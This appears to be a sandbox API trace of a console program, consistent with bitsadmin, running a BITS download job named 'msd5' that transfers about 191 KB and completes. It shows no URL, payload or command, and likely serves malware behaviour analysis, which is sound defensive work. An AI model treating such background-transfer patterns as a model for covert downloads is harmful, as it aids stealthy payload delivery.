[0073.310] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x20de90, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20de90*=0x8) returned 1
[0073.311] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0073.311] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20de80 | out: lpConsoleScreenBufferInfo=0x20de80) returned 1
[0073.311] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x20de98, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20de98*=0x8) returned 1
[0073.311] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0073.311] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20de74 | out: lpConsoleScreenBufferInfo=0x20de74) returned 1
[0073.312] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x20de8c, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20de8c*=0xc) returned 1
[0073.312] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0073.312] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20de84 | out: lpConsoleScreenBufferInfo=0x20de84) returned 1
[0073.312] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x20de9c, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20de9c*=0xa) returned 1
[0073.313] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0073.313] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20de6c | out: lpConsoleScreenBufferInfo=0x20de6c) returned 1
[0073.313] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x20de84, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20de84*=0xa) returned 1
[0073.319] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0073.319] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20de74 | out: lpConsoleScreenBufferInfo=0x20de74) returned 1
[0073.319] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x20de8c, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20de8c*=0x8) returned 1
[0073.319] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0073.320] _vsnwprintf (in: _Buffer=0xa203f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x20de98 | out: _Buffer="0") returned 1
[0073.320] _vsnwprintf (in: _Buffer=0xa203f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x20dea4 | out: _Buffer="1") returned 1
[0073.320] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20de74 | out: lpConsoleScreenBufferInfo=0x20de74) returned 1
[0073.320] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x20de8c, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20de8c*=0x5) returned 1
[0073.320] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0073.320] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20de7c | out: lpConsoleScreenBufferInfo=0x20de7c) returned 1
[0073.320] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x20de94, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20de94*=0x8) returned 1
[0073.321] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0073.321] _vsnwprintf (in: _Buffer=0xa203f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x20dea0 | out: _Buffer="0") returned 1
[0073.321] _vsnwprintf (in: _Buffer=0xa203f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x20dea4 | out: _Buffer="191488") returned 6
[0073.321] _vsnwprintf (in: _Buffer=0xa203f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x20dea0 | out: _Buffer="0") returned 1
[0073.321] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20de8c | out: lpSystemTimeAsFileTime=0x20de8c*(dwLowDateTime=0xdc502010, dwHighDateTime=0x1d469c7))
[0073.321] _finite (_X=0x0) returned 1
[0073.321] _finite (_X=0x0) returned 1
[0073.321] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20de4c | out: lpConsoleScreenBufferInfo=0x20de4c) returned 1
[0073.321] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0x11, lpNumberOfCharsWritten=0x20de64, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20de64*=0x11) returned 1
[0073.321] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0073.322] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20de58 | out: lpConsoleScreenBufferInfo=0x20de58) returned 1
[0073.322] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x20de70, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20de70*=0xf) returned 1
[0073.322] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0073.322] _vsnwprintf (in: _Buffer=0x20dc84, _BufferCount=0xfe, _Format="%.2f B/S", _ArgList=0x20dc48 | out: _Buffer="0.00 B/S") returned 8
[0073.322] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20de9c | out: lpConsoleScreenBufferInfo=0x20de9c) returned 1
[0073.322] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x20deb4, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20deb4*=0x8) returned 1
[0073.323] CoTaskMemFree (pv=0x3883c0)
[0073.323] SetTimer (hWnd=0x0, nIDEvent=0x0, uElapse=0x3e8, lpTimerFunc=0x0) returned 0x7fbe
[0073.323] IBackgroundCopyJob:GetType (in: This=0x37a624, pVal=0x20ef70 | out: pVal=0x20ef70) returned 0x0
[0073.324] IBackgroundCopyJob:GetProgress (in: This=0x37a624, pVal=0x390cc0 | out: pVal=0x390cc0) returned 0x0
[0073.325] IBackgroundCopyJob:GetPriority (in: This=0x37a624, pVal=0x20ef6c | out: pVal=0x20ef6c) returned 0x0
[0073.325] CoTaskMemFree (pv=0x0)
[0073.325] IBackgroundCopyJob:GetDisplayName (in: This=0x37a624, pVal=0x20ef84 | out: pVal=0x20ef84*="msd5") returned 0x0
[0073.326] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20ef2c | out: lpConsoleScreenBufferInfo=0x20ef2c) returned 1
[0073.326] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x20ef44 | out: lpNumberOfCharsWritten=0x20ef44) returned 1
[0073.326] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x20ef44 | out: lpNumberOfAttrsWritten=0x20ef44) returned 1
[0073.327] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0073.327] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0073.327] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20ef18 | out: lpConsoleScreenBufferInfo=0x20ef18) returned 1
[0073.327] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x20ef30, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20ef30*=0xa) returned 1
[0073.327] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0073.328] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20ef14 | out: lpConsoleScreenBufferInfo=0x20ef14) returned 1
[0073.328] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x20ef2c, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20ef2c*=0x5) returned 1
[0073.328] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0073.328] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20ef1c | out: lpConsoleScreenBufferInfo=0x20ef1c) returned 1
[0073.328] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x20ef34, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20ef34*=0x7) returned 1
[0073.328] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0073.329] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20ef10 | out: lpConsoleScreenBufferInfo=0x20ef10) returned 1
[0073.329] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x20ef28, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20ef28*=0x8) returned 1
[0073.329] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0073.329] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20ef18 | out: lpConsoleScreenBufferInfo=0x20ef18) returned 1
[0073.330] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x20ef30, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20ef30*=0x8) returned 1
[0073.330] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0073.330] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20ef0c | out: lpConsoleScreenBufferInfo=0x20ef0c) returned 1
[0073.330] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x20ef24, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20ef24*=0xc) returned 1
[0073.331] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0073.331] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20ef1c | out: lpConsoleScreenBufferInfo=0x20ef1c) returned 1
[0073.331] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x20ef34, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20ef34*=0xa) returned 1
[0073.331] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0073.331] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20ef04 | out: lpConsoleScreenBufferInfo=0x20ef04) returned 1
[0073.332] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x20ef1c, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20ef1c*=0xa) returned 1
[0073.332] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0073.332] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20ef0c | out: lpConsoleScreenBufferInfo=0x20ef0c) returned 1
[0073.332] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x20ef24, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20ef24*=0x8) returned 1
[0073.333] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0073.333] _vsnwprintf (in: _Buffer=0xa203f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x20ef30 | out: _Buffer="0") returned 1
[0073.333] _vsnwprintf (in: _Buffer=0xa203f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x20ef3c | out: _Buffer="1") returned 1
[0073.333] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20ef0c | out: lpConsoleScreenBufferInfo=0x20ef0c) returned 1
[0073.333] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x20ef24, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20ef24*=0x5) returned 1
[0073.333] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0073.334] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20ef14 | out: lpConsoleScreenBufferInfo=0x20ef14) returned 1
[0073.334] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x20ef2c, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20ef2c*=0x8) returned 1
[0073.334] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0073.334] _vsnwprintf (in: _Buffer=0xa203f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x20ef38 | out: _Buffer="0") returned 1
[0073.334] _vsnwprintf (in: _Buffer=0xa203f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x20ef3c | out: _Buffer="191488") returned 6
[0073.334] _vsnwprintf (in: _Buffer=0xa203f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x20ef38 | out: _Buffer="0") returned 1
[0073.334] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20ef24 | out: lpSystemTimeAsFileTime=0x20ef24*(dwLowDateTime=0xdc528170, dwHighDateTime=0x1d469c7))
[0073.335] _finite (_X=0x0) returned 1
[0073.335] _finite (_X=0x0) returned 1
[0073.335] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20eee4 | out: lpConsoleScreenBufferInfo=0x20eee4) returned 1
[0073.335] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0x11, lpNumberOfCharsWritten=0x20eefc, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20eefc*=0x11) returned 1
[0073.335] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0073.335] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20eef0 | out: lpConsoleScreenBufferInfo=0x20eef0) returned 1
[0073.335] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x20ef08, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20ef08*=0xf) returned 1
[0073.336] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0073.336] _vsnwprintf (in: _Buffer=0x20ed1c, _BufferCount=0xfe, _Format="%.2f B/S", _ArgList=0x20ece0 | out: _Buffer="0.00 B/S") returned 8
[0073.336] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20ef34 | out: lpConsoleScreenBufferInfo=0x20ef34) returned 1
[0073.336] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x20ef4c, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20ef4c*=0x8) returned 1
[0073.336] CoTaskMemFree (pv=0x3883c0)
[0073.337] PeekMessageW (in: lpMsg=0x20f8a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x20f8a8) returned 0
[0073.337] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0x20f8d0*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1
[0073.696] PeekMessageW (in: lpMsg=0x20f8a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x20f8a8) returned 1
[0073.696] TranslateMessage (lpMsg=0x20f8a8) returned 0
[0073.696] DispatchMessageW (lpMsg=0x20f8a8) returned 0x1
[0073.696] IBackgroundCopyCallback:JobTransferred (This=0x390cb0, pJob=0x37a6b4) returned 0x0
[0073.696] KillTimer (hWnd=0x0, uIDEvent=0x7fbe) returned 1
[0073.696] IBackgroundCopyJob:GetState (in: This=0x37a624, pVal=0x390cbc | out: pVal=0x390cbc) returned 0x0
[0073.697] IBackgroundCopyCallback:JobModification (This=0x390cb0, pJob=0x37a6b4, dwReserved=0x0) returned 0x0
[0073.697] IBackgroundCopyJob:GetState (in: This=0x37a624, pVal=0x390cbc | out: pVal=0x390cbc) returned 0x0
[0073.698] IBackgroundCopyJob:GetType (in: This=0x37a624, pVal=0x20dee0 | out: pVal=0x20dee0) returned 0x0
[0073.699] IBackgroundCopyJob:GetProgress (in: This=0x37a624, pVal=0x390cc0 | out: pVal=0x390cc0) returned 0x0
[0073.699] IBackgroundCopyJob:GetPriority (in: This=0x37a624, pVal=0x20dedc | out: pVal=0x20dedc) returned 0x0
[0073.700] CoTaskMemFree (pv=0x0)
[0073.700] IBackgroundCopyJob:GetDisplayName (in: This=0x37a624, pVal=0x20def4 | out: pVal=0x20def4*="msd5") returned 0x0
[0073.701] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20de9c | out: lpConsoleScreenBufferInfo=0x20de9c) returned 1
[0073.701] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x20deb4 | out: lpNumberOfCharsWritten=0x20deb4) returned 1
[0073.701] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x20deb4 | out: lpNumberOfAttrsWritten=0x20deb4) returned 1
[0073.701] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0073.701] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0073.702] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20de88 | out: lpConsoleScreenBufferInfo=0x20de88) returned 1
[0073.702] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x20dea0, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20dea0*=0xa) returned 1
[0073.702] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0073.702] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20de84 | out: lpConsoleScreenBufferInfo=0x20de84) returned 1
[0073.702] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x20de9c, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20de9c*=0x5) returned 1
[0073.702] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0073.703] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20de8c | out: lpConsoleScreenBufferInfo=0x20de8c) returned 1
[0073.703] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x20dea4, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20dea4*=0x7) returned 1
[0073.703] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0073.703] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20de80 | out: lpConsoleScreenBufferInfo=0x20de80) returned 1
[0073.703] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x20de98, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20de98*=0x8) returned 1
[0073.703] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0073.704] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20de88 | out: lpConsoleScreenBufferInfo=0x20de88) returned 1
[0073.704] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x20dea0, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20dea0*=0x8) returned 1
[0073.704] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0073.704] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20de7c | out: lpConsoleScreenBufferInfo=0x20de7c) returned 1
[0073.704] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0xd, lpNumberOfCharsWritten=0x20de94, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20de94*=0xd) returned 1
[0073.704] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0073.705] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20de8c | out: lpConsoleScreenBufferInfo=0x20de8c) returned 1
[0073.705] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x20dea4, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20dea4*=0xa) returned 1
[0073.705] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0073.705] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20de74 | out: lpConsoleScreenBufferInfo=0x20de74) returned 1
[0073.705] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x20de8c, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20de8c*=0xa) returned 1
[0073.706] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0073.706] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20de7c | out: lpConsoleScreenBufferInfo=0x20de7c) returned 1
[0073.706] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x20de94, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20de94*=0x8) returned 1
[0073.706] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0073.706] _vsnwprintf (in: _Buffer=0xa203f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x20dea0 | out: _Buffer="1") returned 1
[0073.706] _vsnwprintf (in: _Buffer=0xa203f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x20deac | out: _Buffer="1") returned 1
[0073.706] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20de7c | out: lpConsoleScreenBufferInfo=0x20de7c) returned 1
[0073.706] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x20de94, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20de94*=0x5) returned 1
[0073.707] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0073.707] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20de84 | out: lpConsoleScreenBufferInfo=0x20de84) returned 1
[0073.707] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x20de9c, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20de9c*=0x8) returned 1
[0073.707] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0073.707] _vsnwprintf (in: _Buffer=0xa203f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x20dea8 | out: _Buffer="191488") returned 6
[0073.707] _vsnwprintf (in: _Buffer=0xa203f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x20deac | out: _Buffer="191488") returned 6
[0073.707] _vsnwprintf (in: _Buffer=0xa203f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x20dea8 | out: _Buffer="100") returned 3
[0073.707] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20dea4 | out: lpConsoleScreenBufferInfo=0x20dea4) returned 1
[0073.708] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0x16, lpNumberOfCharsWritten=0x20debc, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20debc*=0x16) returned 1
[0073.708] CoTaskMemFree (pv=0x3883c0)
[0073.708] IBackgroundCopyJob:Complete (This=0x37a624) returned 0x0
[0073.714] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20dea8 | out: lpConsoleScreenBufferInfo=0x20dea8) returned 1
[0073.714] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20de7c | out: lpConsoleScreenBufferInfo=0x20de7c) returned 1
[0073.714] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x20de94, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20de94*=0x2) returned 1
[0073.714] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x20de7c | out: lpConsoleScreenBufferInfo=0x20de7c) returned 1
[0073.714] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xa143c4*, nNumberOfCharsToWrite=0x14, lpNumberOfCharsWritten=0x20de94, lpReserved=0x0 | out: lpBuffer=0xa143c4*, lpNumberOfCharsWritten=0x20de94*=0x14) returned 1
[0073.715] GetCurrentThreadId () returned 0xd1c
[0073.715] PostThreadMessageW (idThread=0xd1c, Msg=0x401, wParam=0x0, lParam=0x0) returned 1
[0073.715] PeekMessageW (in: lpMsg=0x20f8a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x20f8a8) returned 1
[0073.715] IUnknown:Release (This=0x37a624) returned 0x1
[0073.715] IUnknown:Release (This=0x37a54c) returned 0x0
[0073.716] CoUninitialize ()
[0073.716] IUnknown:Release (This=0x390cb0) returned 0x2
[0073.716] IUnknown:Release (This=0x390cb0) returned 0x1
[0073.716] IUnknown:Release (This=0x390cb0) returned 0x0
[0073.716] IUnknown:Release (This=0x37a624) returned 0x1
